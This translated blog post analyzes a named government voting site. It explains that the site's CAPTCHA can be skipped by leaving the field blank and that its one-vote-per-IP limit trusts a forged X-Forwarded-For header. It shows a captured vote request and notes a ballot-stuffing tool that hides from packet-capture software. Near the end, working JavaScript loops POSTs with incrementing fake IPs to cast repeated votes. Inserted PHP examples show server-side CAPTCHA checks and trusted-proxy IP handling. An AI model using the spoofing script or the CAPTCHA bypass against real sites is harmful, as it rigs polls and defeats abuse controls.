Voting website analysis and counterfeit IP technology

Source: Internet
Author: User

Recently a friend needed a voting program, so I studied the target website. It has a CAPTCHA and limits each IP address to one vote, which makes it look like a standard voting site. I started with the CAPTCHA.

The CAPTCHA of this voting website looks easy at first: four digits in fixed positions that are recognized without trouble. After that it changes: the number of characters is no longer fixed, letters appear, and the vertical position varies. The CAPTCHA is not only hard for software to recognize but even hard for a human to read. There seemed to be no way forward.

Through continued analysis I found a flaw in its CAPTCHA check. The CAPTCHA is essentially fake: it does not need to be recognized at all, because the site only uses JavaScript on the voting page to check whether the CAPTCHA field is empty. That JavaScript runs on the client, so the verification has zero effect. Normally JavaScript is used only as a convenience; a voting website that relies on it as its only check, while the dynamic page that processes the vote does not even check whether the CAPTCHA is empty, is hard to praise. This poses a huge risk to the security of the website.

The way around the CAPTCHA is then clear: as long as the CAPTCHA image file is not requested during voting, the CAPTCHA is blank, and since the dynamic page does not check whether the CAPTCHA is empty, one only needs to leave the CAPTCHA parameter blank in the POST.
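The defence this section points at is to validate the CAPTCHA on the vote-processing page rather than in the browser. The following PHP is an added example, not code from the original post or from the site it analyzes; the function names, the session layout and the character set are my own choices, and the session is passed in as an array so the logic can be exercised from the command line (a real handler would pass $_SESSION after session_start()).

```php
<?php
// Added example (not from the original post): server-side CAPTCHA
// validation for the vote-processing page. The session store is passed
// in as an array so the logic can be exercised from the CLI; in a real
// handler you would pass $_SESSION after session_start().

const CAPTCHA_ALPHABET = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789'; // no 0/O/1/I lookalikes
const CAPTCHA_LENGTH   = 5;
const CAPTCHA_TTL      = 300; // seconds a challenge stays valid

// Issue a new challenge. The answer lives only in the server-side session;
// the image generator renders it, it is never sent to the client as text.
function captcha_issue(array &$session): string
{
    $alphabet = CAPTCHA_ALPHABET;
    $max      = strlen($alphabet) - 1;
    $code     = '';
    for ($i = 0; $i < CAPTCHA_LENGTH; $i++) {
        $code .= $alphabet[random_int(0, $max)];
    }
    $session['captcha'] = ['code' => $code, 'issued' => time()];
    return $code;
}

// Verify the submitted answer. Returns true only for a non-empty, unexpired,
// case-insensitive exact match, and always consumes the challenge so one
// answer cannot be replayed across several vote POSTs.
function captcha_verify(array &$session, $submitted): bool
{
    $challenge = $session['captcha'] ?? null;
    unset($session['captcha']);           // one-time use, whether it passes or fails
    if ($challenge === null) {
        return false;                     // no challenge was issued for this session
    }
    if (!is_string($submitted) || trim($submitted) === '') {
        return false;                     // the blank parameter the post describes
    }
    if (time() - $challenge['issued'] > CAPTCHA_TTL) {
        return false;                     // stale challenge
    }
    return hash_equals(strtoupper($challenge['code']), strtoupper(trim($submitted)));
}

// Walk-through on constructed data.
if (PHP_SAPI === 'cli') {
    $session = [];
    $code = captcha_issue($session);
    var_dump(captcha_verify($session, ''));      // case: blank field
    var_dump(captcha_verify($session, $code));   // case: challenge already consumed
    $code = captcha_issue($session);
    var_dump(captcha_verify($session, $code));   // case: correct answer, first use
    var_dump(captcha_verify($session, $code));   // case: replay of the same answer
}
```

Two properties matter here: the check runs on the server, so the empty-parameter POST described above is rejected regardless of any JavaScript, and the challenge is consumed on every attempt, so a single solved CAPTCHA cannot be reused for a second vote.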

Another problem is that the voting website checks the IP address and limits each IP address to one vote. As far as I could see, this can only be gotten around with a proxy or by disconnecting and redialing; I really could not think of any other good method. Later this friend found a program that can vote on this website quickly. I was curious how the program dealt with the IP limit, so I asked my friend for it to analyze.

First I tried capturing the voting program's packets. After setting up, I opened the voting program and it immediately prompted "Software conflict!" and would not run. So I closed some programs, leaving only the packet-capture tool, and it still reported a conflict. The program evidently anticipates that someone may analyze it: it traverses the process names and checks whether a suspicious program exists, and if an analysis or packet-capture program is found it refuses to run. The software it blocks includes the Easy Language (易语言) programming environment and the wsockexpert_cn packet-capture tool. Closing Easy Language and renaming wsockexpert_cn was enough to pass the software's own security check and run it.

The following is the data packet the program sent when I voted with it:

POST /vote/view.php?SID=33&Act=vote HTTP/1.1
Accept: */*
Referer: http://www.qdnfy.gov.cn/vote/vote.php
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 218.20.218.200
Client_ip: 218.415218.200
Via: 218.425218.200
Remote_addr: 218.426218.200
Accept-Language: zh-cn
Accept-Encoding: Text
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Server Load balancer; .NET CLR 2.0.50727; .NET CLR 3.0.04506)
Host: www.qdnfy.gov.cn
Cookie: PHPSESSID=pldjnb6scereodjm5niqb9q990
Content-Length: 49
Connection: Close

I noticed an X-Forwarded-For field in the HTTP header, followed by an IP address. This header must be the trick; I had never heard of it before, so I looked it up on Baidu.

The following is an article I found on Baidu. Let's take a look.

Forging the X-Forwarded-For field in the HTTP header to forge the IP address
Searching Baidu for the principle of X-Forwarded-For shows that it has been around for a long time.
X-Forwarded-For, the XFF header, represents the real IP address of the client, that is, the HTTP request end. This header is added only when the request passes through an HTTP proxy or load balancer.
It is not a standard request header defined in an RFC; it can be found in the Squid cache proxy server development documentation.
The standard format is as follows:
X-Forwarded-For: client1, proxy1, proxy2
From the standard format we can see that the X-Forwarded-For header can carry multiple values, separated by commas. The first item is the real client IP address; the rest are the IP addresses of the proxies or load balancers that the request has passed through, one entry per proxy.
Wikipedia's X-Forwarded-For entry: http://en.wikipedia.org/wiki/X-Forwarded-For
Analysis:
Since the client IP address can be forged, let's first look at how websites obtain the client IP address (taking PHP as an example). This code was found on Baidu and is probably used by many websites.

<?php
// Whether a proxy is in use: if the Via header is present, take the client IP
// from X-Forwarded-For, otherwise from REMOTE_ADDR.
$user_ip = ($_SERVER["HTTP_VIA"])
    ? $_SERVER["HTTP_X_FORWARDED_FOR"]
    : $_SERVER["REMOTE_ADDR"];
// If that yields nothing, fall back to REMOTE_ADDR.
$user_ip = ($user_ip) ? $user_ip : $_SERVER["REMOTE_ADDR"];
?>
First it checks whether the HTTP_VIA header exists; HTTP_VIA indicates whether a proxy server was used. If not, the client IP address is taken from REMOTE_ADDR; if so, it is taken from X-Forwarded-For.
I suspect many programmers use this code from Baidu; the ASP version is similar.
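As an added example (not code from the original post or from the site it analyzes), here is the same client-IP lookup written twice in PHP: the Baidu logic quoted above, and a hardened version that consults X-Forwarded-For only when the TCP peer is one of the site's own proxies. Note that in the captured packet above the Via header is forged along with X-Forwarded-For, which is why "Via is present" is no evidence that a proxy was actually involved. The trusted-proxy addresses, the request arrays and the IP values are constructed for illustration, and the functions take the server array as a parameter instead of reading $_SERVER so both can be run from the command line.

```php
<?php
// Added example (not from the original post): resolving the client IP
// without trusting headers the client controls. The request headers are
// passed in as an array so several requests can be compared side by side.
// The proxy list and all addresses below are constructed.

// Addresses of the reverse proxies / load balancers actually in front of
// this application. Only they are allowed to speak for the client.
const TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

// Logic of the Baidu snippet quoted in the post: Via means "behind a proxy",
// and then X-Forwarded-For is believed outright. Both headers are written by
// whoever sends the request, so the result is attacker-chosen.
function client_ip_naive(array $server): string
{
    $ip = !empty($server['HTTP_VIA'])
        ? ($server['HTTP_X_FORWARDED_FOR'] ?? '')
        : ($server['REMOTE_ADDR'] ?? '');
    return $ip !== '' ? $ip : ($server['REMOTE_ADDR'] ?? '');
}

// Hardened version: REMOTE_ADDR comes from the TCP connection and cannot be
// set by a header. X-Forwarded-For is used only when that peer is a known
// proxy, and is read from the right, skipping our own proxies, so the value
// used is the one our proxy appended rather than whatever the client put at
// the front of the list.
function client_ip_trusted(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, TRUSTED_PROXIES, true)) {
        return $remote;                 // direct connection: the header is noise
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], TRUSTED_PROXIES, true)) {
            continue;                   // one of our own proxies, keep walking left
        }
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) !== false) {
            return $hops[$i];           // first untrusted hop from the right
        }
        break;                          // malformed entry: stop trusting the chain
    }
    return $remote;                     // header empty or unusable
}

// Constructed requests: (1) a direct connection carrying forged headers, in the
// shape of the captured packet in the post; (2) the same request arriving
// through a real proxy, which appended the true peer address.
$forged = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_VIA'             => '218.20.218.200',
    'HTTP_X_FORWARDED_FOR' => '218.20.218.200',
];
$proxied = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '218.20.218.200, 203.0.113.7', // client-supplied fake hop, then the proxy's entry
];

if (PHP_SAPI === 'cli') {
    echo "naive,   forged request : ", client_ip_naive($forged), "\n";   // attacker-chosen value
    echo "trusted, forged request : ", client_ip_trusted($forged), "\n"; // the TCP peer
    echo "trusted, proxied request: ", client_ip_trusted($proxied), "\n"; // the hop our proxy appended
}
```

The one-vote-per-IP limit should be keyed on the value returned by client_ip_trusted(). Keyed on the naive value, every request with a different X-Forwarded-For counts as a new voter, which is exactly the behaviour the demo client below relies on.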
Then let's test it.
Server code:

<?php
// Output HTTP_X_FORWARDED_FOR
echo "HTTP_X_FORWARDED_FOR: " . $_SERVER["HTTP_X_FORWARDED_FOR"];
// Output REMOTE_ADDR
echo "REMOTE_ADDR: " . $_SERVER["REMOTE_ADDR"];
?>

The two client IP addresses obtained are different; REMOTE_ADDR is the real IP address.
Therefore, if a website uses X-Forwarded-For to determine the client's IP address, this logic flaw can be used to cast repeated votes.
Demo address: http://87year.info/t00ls/vote/index.html (right-click to view the full client source)

Client code:
<script>
function createXMLHttp() {
    var xmlhttp = false; // start as false; if it stays false, no XMLHttpRequest object could be created
    try {
        xmlhttp = new XMLHttpRequest(); // every browser except old IE supports this
    } catch (e) {
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); // newer IE versions
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); // older IE versions
            } catch (failed) {
                xmlhttp = false; // keep it false if everything fails
            }
        }
    }
    return xmlhttp;
}
var g_i = 0;
function $(obj) {
    return document.getElementById(obj);
}
function onsearch() {
    var g_xmlhttp = createXMLHttp();
    if (g_xmlhttp === false) {
        alert("Your browser does not support Ajax");
        return;
    }
    var senddata = "bid=" + $("id").value;
    var fakeip = $("ip").value + g_i; // the prefix typed in the form plus the request counter
    // alert(fakeip); return;
    g_xmlhttp.open("POST", "http://192.168.15.166/ip.php", true);
    g_xmlhttp.setRequestHeader("Content-Length", senddata.length);
    g_xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    g_xmlhttp.setRequestHeader("X-Forwarded-For", fakeip);
    g_xmlhttp.onreadystatechange = function () {
        if (/* g_xmlhttp.status == 200 */ g_xmlhttp.readyState == 4) {
            $("res").innerHTML += g_xmlhttp.responseText + "<br/>";
            if (++g_i < 5) {
                setTimeout(onsearch, 1000);
            }
        }
    };
    g_xmlhttp.send(senddata);
}
</script>
<form name="form1" method="post" action="" id="form1">
<div>
<br/>
IP address: <input id="ip" type="text" value="200.156.4."/><br/>
Voting ID: <input id="id" type="text" value="232"/><br/>
<input id="search" type="button" value="start" onclick="onsearch()"/>
<br/>
<br/>
<span id="res"></span>
<br/>
<br/>
</div>
</form>
